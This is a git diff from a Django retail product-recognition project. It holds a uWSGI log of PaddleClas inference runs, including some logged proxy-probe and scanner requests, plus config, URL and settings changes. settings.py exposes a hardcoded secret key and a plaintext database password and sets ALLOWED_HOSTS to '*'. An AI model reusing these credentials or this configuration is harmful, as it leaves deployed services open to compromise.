== +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:07:07 INFO: DetPostProcess : +2022-02-21 03:07:07 INFO: DetPreProcess : +2022-02-21 03:07:07 INFO: transform_ops : +2022-02-21 03:07:07 INFO: DetResize : +2022-02-21 03:07:07 INFO: interp : 2 +2022-02-21 03:07:07 INFO: keep_ratio : False +2022-02-21 03:07:07 INFO: target_size : [640, 640] +2022-02-21 03:07:07 INFO: DetNormalizeImage : +2022-02-21 03:07:07 INFO: is_scale : True +2022-02-21 03:07:07 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:07:07 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:07:07 INFO: DetPermute : +2022-02-21 03:07:07 INFO: Global : +2022-02-21 03:07:07 INFO: batch_size : 1 +2022-02-21 03:07:07 INFO: cpu_num_threads : 1 +2022-02-21 03:07:07 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:07:07 INFO: enable_benchmark : True +2022-02-21 03:07:07 INFO: enable_mkldnn : True +2022-02-21 03:07:07 INFO: enable_profile : False +2022-02-21 03:07:07 INFO: gpu_mem : 8000 +2022-02-21 03:07:07 INFO: image_shape : [3, 640, 640] +2022-02-21 03:07:07 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:07:07 INFO: ir_optim : True +2022-02-21 03:07:07 INFO: labe_list : ['foreground'] +2022-02-21 03:07:07 INFO: max_det_results : 5 +2022-02-21 03:07:07 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:07:07 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:07:07 INFO: threshold : 0.2 +2022-02-21 03:07:07 INFO: use_fp16 : False +2022-02-21 03:07:07 INFO: use_gpu : False +2022-02-21 03:07:07 INFO: use_tensorrt : False +2022-02-21 03:07:07 INFO: IndexProcess : +2022-02-21 03:07:07 INFO: 
index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:07:07 INFO: return_k : 5 +2022-02-21 03:07:07 INFO: score_thres : 0.5 +2022-02-21 03:07:07 INFO: RecPostProcess : None +2022-02-21 03:07:07 INFO: RecPreProcess : +2022-02-21 03:07:07 INFO: transform_ops : +2022-02-21 03:07:07 INFO: ResizeImage : +2022-02-21 03:07:07 INFO: size : 224 +2022-02-21 03:07:07 INFO: NormalizeImage : +2022-02-21 03:07:07 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:07:07 INFO: order : +2022-02-21 03:07:07 INFO: scale : 0.00392157 +2022-02-21 03:07:07 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:07:07 INFO: ToCHWImage : None +Inference: 377.2568702697754 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1788/2070] 171.43.147.19 () {32 vars in 419 bytes} [Mon Feb 21 03:07:06 2022] POST /reference_client/ => generated 98 bytes in 3001 msecs (HTTP/1.1 200) 5 headers in 157 bytes (14 switches on core 0) +req +2022-02-21 03:07:38 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:07:38 INFO: DetPostProcess : +2022-02-21 03:07:38 INFO: DetPreProcess : +2022-02-21 03:07:38 INFO: transform_ops : +2022-02-21 03:07:38 INFO: DetResize : +2022-02-21 03:07:38 INFO: interp : 2 +2022-02-21 03:07:38 INFO: keep_ratio : False +2022-02-21 03:07:38 INFO: target_size : [640, 640] +2022-02-21 03:07:38 INFO: DetNormalizeImage : +2022-02-21 03:07:38 INFO: is_scale : True +2022-02-21 03:07:38 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:07:38 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:07:38 INFO: DetPermute : +2022-02-21 03:07:38 INFO: Global : +2022-02-21 03:07:38 INFO: batch_size : 1 +2022-02-21 03:07:38 INFO: cpu_num_threads : 1 +2022-02-21 03:07:38 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:07:38 INFO: enable_benchmark : True +2022-02-21 03:07:38 INFO: enable_mkldnn : True +2022-02-21 03:07:38 INFO: enable_profile : False +2022-02-21 03:07:38 INFO: gpu_mem : 8000 +2022-02-21 03:07:38 INFO: image_shape : [3, 640, 640] +2022-02-21 03:07:38 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:07:38 INFO: ir_optim : True +2022-02-21 03:07:38 INFO: labe_list : ['foreground'] +2022-02-21 03:07:38 INFO: max_det_results : 5 +2022-02-21 03:07:38 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:07:38 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:07:38 INFO: threshold : 0.2 +2022-02-21 03:07:38 INFO: use_fp16 : False +2022-02-21 03:07:38 INFO: use_gpu : False +2022-02-21 03:07:38 INFO: use_tensorrt : False +2022-02-21 03:07:38 INFO: IndexProcess : +2022-02-21 03:07:38 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:07:38 INFO: return_k : 5 +2022-02-21 
03:07:38 INFO: score_thres : 0.5 +2022-02-21 03:07:38 INFO: RecPostProcess : None +2022-02-21 03:07:38 INFO: RecPreProcess : +2022-02-21 03:07:38 INFO: transform_ops : +2022-02-21 03:07:38 INFO: ResizeImage : +2022-02-21 03:07:38 INFO: size : 224 +2022-02-21 03:07:38 INFO: NormalizeImage : +2022-02-21 03:07:38 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:07:38 INFO: order : +2022-02-21 03:07:38 INFO: scale : 0.00392157 +2022-02-21 03:07:38 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:07:38 INFO: ToCHWImage : None +Inference: 373.80099296569824 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19147|app: 0|req: 125/2071] 171.43.147.19 () {32 vars in 420 bytes} [Mon Feb 21 03:07:37 2022] POST /reference_client/ => generated 98 bytes in 2966 msecs (HTTP/1.1 200) 5 headers in 157 bytes (18 switches on core 0) +req +2022-02-21 03:08:54 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:08:54 INFO: DetPostProcess : +2022-02-21 03:08:54 INFO: DetPreProcess : +2022-02-21 03:08:54 INFO: transform_ops : +2022-02-21 03:08:54 INFO: DetResize : +2022-02-21 03:08:54 INFO: interp : 2 +2022-02-21 03:08:54 INFO: keep_ratio : False +2022-02-21 03:08:54 INFO: target_size : [640, 640] +2022-02-21 03:08:54 INFO: DetNormalizeImage : +2022-02-21 03:08:54 INFO: is_scale : True +2022-02-21 03:08:54 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:08:54 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:08:54 INFO: DetPermute : +2022-02-21 03:08:54 INFO: Global : +2022-02-21 03:08:54 INFO: batch_size : 1 +2022-02-21 03:08:54 INFO: cpu_num_threads : 1 +2022-02-21 03:08:54 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:08:54 INFO: enable_benchmark : True +2022-02-21 03:08:54 INFO: enable_mkldnn : True +2022-02-21 03:08:54 INFO: enable_profile : False +2022-02-21 03:08:54 INFO: gpu_mem : 8000 +2022-02-21 03:08:54 INFO: image_shape : [3, 640, 640] +2022-02-21 03:08:54 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:08:54 INFO: ir_optim : True +2022-02-21 03:08:54 INFO: labe_list : ['foreground'] +2022-02-21 03:08:54 INFO: max_det_results : 5 +2022-02-21 03:08:54 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:08:54 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:08:54 INFO: threshold : 0.2 +2022-02-21 03:08:54 INFO: use_fp16 : False +2022-02-21 03:08:54 INFO: use_gpu : False +2022-02-21 03:08:54 INFO: use_tensorrt : False +2022-02-21 03:08:54 INFO: IndexProcess : +2022-02-21 03:08:54 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:08:54 INFO: return_k : 5 +2022-02-21 
03:08:54 INFO: score_thres : 0.5 +2022-02-21 03:08:54 INFO: RecPostProcess : None +2022-02-21 03:08:54 INFO: RecPreProcess : +2022-02-21 03:08:54 INFO: transform_ops : +2022-02-21 03:08:54 INFO: ResizeImage : +2022-02-21 03:08:54 INFO: size : 224 +2022-02-21 03:08:54 INFO: NormalizeImage : +2022-02-21 03:08:54 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:08:54 INFO: order : +2022-02-21 03:08:54 INFO: scale : 0.00392157 +2022-02-21 03:08:54 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:08:54 INFO: ToCHWImage : None +Inference: 374.9117851257324 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1789/2072] 171.43.147.19 () {32 vars in 420 bytes} [Mon Feb 21 03:08:52 2022] POST /reference_client/ => generated 98 bytes in 2981 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) +req +2022-02-21 03:16:28 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:16:28 INFO: DetPostProcess : +2022-02-21 03:16:28 INFO: DetPreProcess : +2022-02-21 03:16:28 INFO: transform_ops : +2022-02-21 03:16:28 INFO: DetResize : +2022-02-21 03:16:28 INFO: interp : 2 +2022-02-21 03:16:28 INFO: keep_ratio : False +2022-02-21 03:16:28 INFO: target_size : [640, 640] +2022-02-21 03:16:28 INFO: DetNormalizeImage : +2022-02-21 03:16:28 INFO: is_scale : True +2022-02-21 03:16:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:16:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:16:28 INFO: DetPermute : +2022-02-21 03:16:28 INFO: Global : +2022-02-21 03:16:28 INFO: batch_size : 1 +2022-02-21 03:16:28 INFO: cpu_num_threads : 1 +2022-02-21 03:16:28 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:16:28 INFO: enable_benchmark : True +2022-02-21 03:16:28 INFO: enable_mkldnn : True +2022-02-21 03:16:28 INFO: enable_profile : False +2022-02-21 03:16:28 INFO: gpu_mem : 8000 +2022-02-21 03:16:28 INFO: image_shape : [3, 640, 640] +2022-02-21 03:16:28 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:16:28 INFO: ir_optim : True +2022-02-21 03:16:28 INFO: labe_list : ['foreground'] +2022-02-21 03:16:28 INFO: max_det_results : 5 +2022-02-21 03:16:28 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:16:28 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:16:28 INFO: threshold : 0.2 +2022-02-21 03:16:28 INFO: use_fp16 : False +2022-02-21 03:16:28 INFO: use_gpu : False +2022-02-21 03:16:28 INFO: use_tensorrt : False +2022-02-21 03:16:28 INFO: IndexProcess : +2022-02-21 03:16:28 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:16:28 INFO: return_k : 5 +2022-02-21 
03:16:28 INFO: score_thres : 0.5 +2022-02-21 03:16:28 INFO: RecPostProcess : None +2022-02-21 03:16:28 INFO: RecPreProcess : +2022-02-21 03:16:28 INFO: transform_ops : +2022-02-21 03:16:28 INFO: ResizeImage : +2022-02-21 03:16:28 INFO: size : 224 +2022-02-21 03:16:28 INFO: NormalizeImage : +2022-02-21 03:16:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:16:28 INFO: order : +2022-02-21 03:16:28 INFO: scale : 0.00392157 +2022-02-21 03:16:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:16:28 INFO: ToCHWImage : None +Inference: 374.9380111694336 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1790/2073] 171.43.147.19 () {32 vars in 419 bytes} [Mon Feb 21 03:16:27 2022] POST /reference_client/ => generated 98 bytes in 3006 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) +req +2022-02-21 03:16:34 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:16:34 INFO: DetPostProcess : +2022-02-21 03:16:34 INFO: DetPreProcess : +2022-02-21 03:16:34 INFO: transform_ops : +2022-02-21 03:16:34 INFO: DetResize : +2022-02-21 03:16:34 INFO: interp : 2 +2022-02-21 03:16:34 INFO: keep_ratio : False +2022-02-21 03:16:34 INFO: target_size : [640, 640] +2022-02-21 03:16:34 INFO: DetNormalizeImage : +2022-02-21 03:16:34 INFO: is_scale : True +2022-02-21 03:16:34 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:16:34 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:16:34 INFO: DetPermute : +2022-02-21 03:16:34 INFO: Global : +2022-02-21 03:16:34 INFO: batch_size : 1 +2022-02-21 03:16:34 INFO: cpu_num_threads : 1 +2022-02-21 03:16:34 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:16:34 INFO: enable_benchmark : True +2022-02-21 03:16:34 INFO: enable_mkldnn : True +2022-02-21 03:16:34 INFO: enable_profile : False +2022-02-21 03:16:34 INFO: gpu_mem : 8000 +2022-02-21 03:16:34 INFO: image_shape : [3, 640, 640] +2022-02-21 03:16:34 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:16:34 INFO: ir_optim : True +2022-02-21 03:16:34 INFO: labe_list : ['foreground'] +2022-02-21 03:16:34 INFO: max_det_results : 5 +2022-02-21 03:16:34 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:16:34 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:16:34 INFO: threshold : 0.2 +2022-02-21 03:16:34 INFO: use_fp16 : False +2022-02-21 03:16:34 INFO: use_gpu : False +2022-02-21 03:16:34 INFO: use_tensorrt : False +2022-02-21 03:16:34 INFO: IndexProcess : +2022-02-21 03:16:34 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:16:34 INFO: return_k : 5 +2022-02-21 
03:16:34 INFO: score_thres : 0.5 +2022-02-21 03:16:34 INFO: RecPostProcess : None +2022-02-21 03:16:34 INFO: RecPreProcess : +2022-02-21 03:16:34 INFO: transform_ops : +2022-02-21 03:16:34 INFO: ResizeImage : +2022-02-21 03:16:34 INFO: size : 224 +2022-02-21 03:16:34 INFO: NormalizeImage : +2022-02-21 03:16:34 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:16:34 INFO: order : +2022-02-21 03:16:34 INFO: scale : 0.00392157 +2022-02-21 03:16:34 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:16:34 INFO: ToCHWImage : None +Inference: 377.274751663208 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19146|app: 0|req: 60/2074] 171.43.147.19 () {32 vars in 419 bytes} [Mon Feb 21 03:16:33 2022] POST /reference_client/ => generated 98 bytes in 2992 msecs (HTTP/1.1 200) 5 headers in 157 bytes (16 switches on core 0) +[pid: 19148|app: 0|req: 1791/2075] 210.51.42.139 () {36 vars in 801 bytes} [Mon Feb 21 03:54:07 2022] POST /search/ => generated 19976 bytes in 10 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1792/2076] 222.186.19.207 () {30 vars in 615 bytes} [Mon Feb 21 04:43:09 2022] GET http://opendata.baidu.com/api.php?query=47.100.88.229&co=&resource_id=48296&oe=utf8 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1793/2077] 222.186.19.207 () {26 vars in 353 bytes} [Mon Feb 21 04:43:09 2022] CONNECT opendata.baidu.com:443 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1794/2078] 222.186.19.207 () {26 vars in 353 bytes} [Mon Feb 21 04:43:09 2022] CONNECT opendata.baidu.com:443 => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +2022-02-21 05:04:28 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! 
== +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 05:04:28 INFO: DetPostProcess : +2022-02-21 05:04:28 INFO: DetPreProcess : +2022-02-21 05:04:28 INFO: transform_ops : +2022-02-21 05:04:28 INFO: DetResize : +2022-02-21 05:04:28 INFO: interp : 2 +2022-02-21 05:04:28 INFO: keep_ratio : False +2022-02-21 05:04:28 INFO: target_size : [640, 640] +2022-02-21 05:04:28 INFO: DetNormalizeImage : +2022-02-21 05:04:28 INFO: is_scale : True +2022-02-21 05:04:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 05:04:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 05:04:28 INFO: DetPermute : +2022-02-21 05:04:28 INFO: Global : +2022-02-21 05:04:28 INFO: batch_size : 1 +2022-02-21 05:04:28 INFO: cpu_num_threads : 1 +2022-02-21 05:04:28 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 05:04:28 INFO: enable_benchmark : True +2022-02-21 05:04:28 INFO: enable_mkldnn : True +2022-02-21 05:04:28 INFO: enable_profile : False +2022-02-21 05:04:28 INFO: gpu_mem : 8000 +2022-02-21 05:04:28 INFO: image_shape : [3, 640, 640] +2022-02-21 05:04:28 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-02-21 05:04:28 INFO: ir_optim : True +2022-02-21 05:04:28 INFO: labe_list : ['foreground'] +2022-02-21 05:04:28 INFO: max_det_results : 5 +2022-02-21 05:04:28 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 05:04:28 INFO: rec_nms_thresold : 0.05 +2022-02-21 05:04:28 INFO: threshold : 0.2 +2022-02-21 05:04:28 INFO: use_fp16 : False +2022-02-21 05:04:28 INFO: use_gpu : False +2022-02-21 05:04:28 INFO: use_tensorrt : False +2022-02-21 05:04:28 INFO: IndexProcess : +2022-02-21 05:04:28 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 05:04:28 INFO: return_k : 5 +2022-02-21 05:04:28 INFO: score_thres : 0.5 +2022-02-21 05:04:28 INFO: RecPostProcess : None +2022-02-21 05:04:28 INFO: RecPreProcess : +2022-02-21 05:04:28 INFO: transform_ops : +2022-02-21 05:04:28 INFO: ResizeImage : +2022-02-21 05:04:28 INFO: size : 224 +2022-02-21 05:04:28 INFO: NormalizeImage : +2022-02-21 05:04:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 05:04:28 INFO: order : +2022-02-21 05:04:28 INFO: scale : 0.00392157 +2022-02-21 05:04:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 05:04:28 INFO: ToCHWImage : None +Inference: 376.6441345214844 ms per batch image +[{'bbox': [0, 0, 640, 854], 'rec_docs': '小度充电宝', 'rec_scores': 1.0}] +{'bbox': [0, 0, 640, 854], 'rec_docs': '小度充电宝', 'rec_scores': 1.0} +234 +["{'bbox': [0, 0, 640, 854], 'rec_docs': '小度充电宝', 'rec_scores': 1.0}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 19148|app: 0|req: 1795/2079] 210.51.42.139 () {36 vars in 810 bytes} [Mon Feb 21 05:04:27 2022] POST /reference/ => generated 120 bytes in 2913 msecs (HTTP/1.1 200) 5 headers in 158 bytes (11 switches on core 0) +[pid: 19147|app: 0|req: 126/2080] 61.165.111.99 () {38 vars in 729 bytes} [Mon Feb 21 05:04:56 2022] POST /search/ => generated 20091 bytes in 11 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1796/2081] 83.97.20.34 () {26 vars in 287 bytes} [Mon Feb 21 05:18:14 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1797/2082] 23.250.19.242 () {34 vars in 536 bytes} [Mon Feb 21 05:22:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1798/2083] 23.250.19.242 () {30 vars in 359 bytes} [Mon Feb 21 05:22:25 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 1799/2084] 81.17.24.154 () {40 vars in 627 bytes} [Mon Feb 21 05:45:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) diff --git a/Smart_container/conf/uwsgi/uwsgi.ini b/Smart_container/conf/uwsgi/uwsgi.ini index d06de41..29318b3 100644 --- a/Smart_container/conf/uwsgi/uwsgi.ini +++ b/Smart_container/conf/uwsgi/uwsgi.ini @@ -7,18 +7,15 @@ http = :8001 chdir = /root/Smart_container # Django's wsgi file module = djangoProject.wsgi:application - -# the virtualenv (full path) - # process-related settings +pidfile = /root/Smart_container/conf/uwsgi/uwsgi.pid # master +wsgi-file = /root/Smart_container/djangoProject/wsgi.py master = true # maximum number of worker processes processes = 10 # the socket (use the full path to be safe socket = 127.0.0.1:8000 -# ... with appropriate permissions - may be needed -# chmod-socket = 664 # clear environment on exit vacuum = true # 使进程在后台运行,并将日志打到指定的日志文件或者udp服务器 @@ -26,3 +23,4 @@ daemonize = /root/Smart_container/conf/uwsgi/Smart_container_uwsgi.log #设置最大日志文件大小 log-maxsize = 5000000 + diff --git a/Smart_container/conf/uwsgi/uwsgi.pid b/Smart_container/conf/uwsgi/uwsgi.pid new file mode 100644 index 0000000..e16a94e --- /dev/null +++ b/Smart_container/conf/uwsgi/uwsgi.pid @@ -0,0 +1 @@ +19137 diff --git a/Smart_container/djangoProject/__pycache__/__init__.cpython-36.pyc b/Smart_container/djangoProject/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..65f3ef2 Binary files /dev/null and b/Smart_container/djangoProject/__pycache__/__init__.cpython-36.pyc differ diff --git a/Smart_container/djangoProject/__pycache__/__init__.cpython-37.pyc b/Smart_container/djangoProject/__pycache__/__init__.cpython-37.pyc deleted file mode 100644 index 8b93db8..0000000 Binary files a/Smart_container/djangoProject/__pycache__/__init__.cpython-37.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/__init__.cpython-38.pyc 
b/Smart_container/djangoProject/__pycache__/__init__.cpython-38.pyc deleted file mode 100644 index 9f028d6..0000000 Binary files a/Smart_container/djangoProject/__pycache__/__init__.cpython-38.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/settings.cpython-36.pyc b/Smart_container/djangoProject/__pycache__/settings.cpython-36.pyc new file mode 100644 index 0000000..d269f5f Binary files /dev/null and b/Smart_container/djangoProject/__pycache__/settings.cpython-36.pyc differ diff --git a/Smart_container/djangoProject/__pycache__/settings.cpython-37.pyc b/Smart_container/djangoProject/__pycache__/settings.cpython-37.pyc deleted file mode 100644 index c2cd1fa..0000000 Binary files a/Smart_container/djangoProject/__pycache__/settings.cpython-37.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/settings.cpython-38.pyc b/Smart_container/djangoProject/__pycache__/settings.cpython-38.pyc deleted file mode 100644 index 5d6fdd9..0000000 Binary files a/Smart_container/djangoProject/__pycache__/settings.cpython-38.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/urls.cpython-38.pyc b/Smart_container/djangoProject/__pycache__/urls.cpython-36.pyc similarity index 51% rename from Smart_container/djangoProject/__pycache__/urls.cpython-38.pyc rename to Smart_container/djangoProject/__pycache__/urls.cpython-36.pyc index 5db3f0b..d2f3e19 100644 Binary files a/Smart_container/djangoProject/__pycache__/urls.cpython-38.pyc and b/Smart_container/djangoProject/__pycache__/urls.cpython-36.pyc differ diff --git a/Smart_container/djangoProject/__pycache__/urls.cpython-37.pyc b/Smart_container/djangoProject/__pycache__/urls.cpython-37.pyc deleted file mode 100644 index fdaeacc..0000000 Binary files a/Smart_container/djangoProject/__pycache__/urls.cpython-37.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/__pycache__/wsgi.cpython-38.pyc 
b/Smart_container/djangoProject/__pycache__/wsgi.cpython-36.pyc similarity index 68% rename from Smart_container/djangoProject/__pycache__/wsgi.cpython-38.pyc rename to Smart_container/djangoProject/__pycache__/wsgi.cpython-36.pyc index c78a13f..46926f2 100644 Binary files a/Smart_container/djangoProject/__pycache__/wsgi.cpython-38.pyc and b/Smart_container/djangoProject/__pycache__/wsgi.cpython-36.pyc differ diff --git a/Smart_container/djangoProject/__pycache__/wsgi.cpython-37.pyc b/Smart_container/djangoProject/__pycache__/wsgi.cpython-37.pyc deleted file mode 100644 index 9c1614e..0000000 Binary files a/Smart_container/djangoProject/__pycache__/wsgi.cpython-37.pyc and /dev/null differ diff --git a/Smart_container/djangoProject/settings.py b/Smart_container/djangoProject/settings.py index 7bca838..06174e6 100644 --- a/Smart_container/djangoProject/settings.py +++ b/Smart_container/djangoProject/settings.py @@ -27,7 +27,7 @@ SECRET_KEY = 'django-insecure-a5iwd(8ljs7)5x3_sfoni_&tpq+d4$&i-wul_oysicg8g$+hak # SECURITY WARNING: don't run with debug turned on in production! 
DEBUG = False -ALLOWED_HOSTS = ['106.12.78.130'] +ALLOWED_HOSTS = ['*'] # Application definition @@ -40,8 +40,6 @@ INSTALLED_APPS = [ 'django.contrib.messages', 'django.contrib.staticfiles', 'app01.apps.App01Config', - 'captcha', - 'tyadmin_api_cli', # 'tyadmin_api' ] @@ -86,7 +84,7 @@ DATABASES = { 'ENGINE': 'django.db.backends.mysql', # 要连接的 数据库类型 'HOST': 'localhost', # 要连接的远程数据库的 ip地址 'PORT': '3306', # 数据库连接端口,mysql默认3306 - 'USER': 'SM_c', # 数据库已有用户名 + 'USER': 'SM_C', # 数据库已有用户名` 'PASSWORD': '105316', # 数据库已有用户密码 'NAME': 'container', # 要连接的 数据库名 } diff --git a/Smart_container/djangoProject/urls.py b/Smart_container/djangoProject/urls.py index 2534cfa..89fec56 100644 --- a/Smart_container/djangoProject/urls.py +++ b/Smart_container/djangoProject/urls.py @@ -28,10 +28,11 @@ urlpatterns = [ path('record/', views.record), path('delete/', views.delete), path('replace/', views.replace), + path('stockSale/', views.stock_sale), path('find/', views.find), path('reference/', views.reference), path('reference_client/',views.reference_client), - re_path('media/(?P.*)', serve, {"document_root": settings.MEDIA_ROOT}), + # re_path('media/(?P.*)', serve, {"document_root": settings.MEDIA_ROOT}), # re_path('^xadmin/.*', AdminIndexView.as_view()), # path('api/xadmin1/', include('tyadmin_api.urls')), ] diff --git a/Smart_container/djangoProject/views.py b/Smart_container/djangoProject/views.py new file mode 100644 index 0000000..6bba9cb --- /dev/null +++ b/Smart_container/djangoProject/views.py @@ -0,0 +1,477 @@ +#图片处理 +import base64 +import binascii +import hashlib +import json +import os +import shutil +import sys +from typing import Container + +import cv2 +#import memcache +import numpy as np +import pymysql +import requests +# 数据库相关操作 +from app01 import models +from django.http import HttpResponse, JsonResponse +from django.shortcuts import HttpResponse, render +#检索 +from fuzzywuzzy import fuzz, process +#登陆用 +from pyDes import CBC, PAD_PKCS5, des +from xpinyin import Pinyin + 
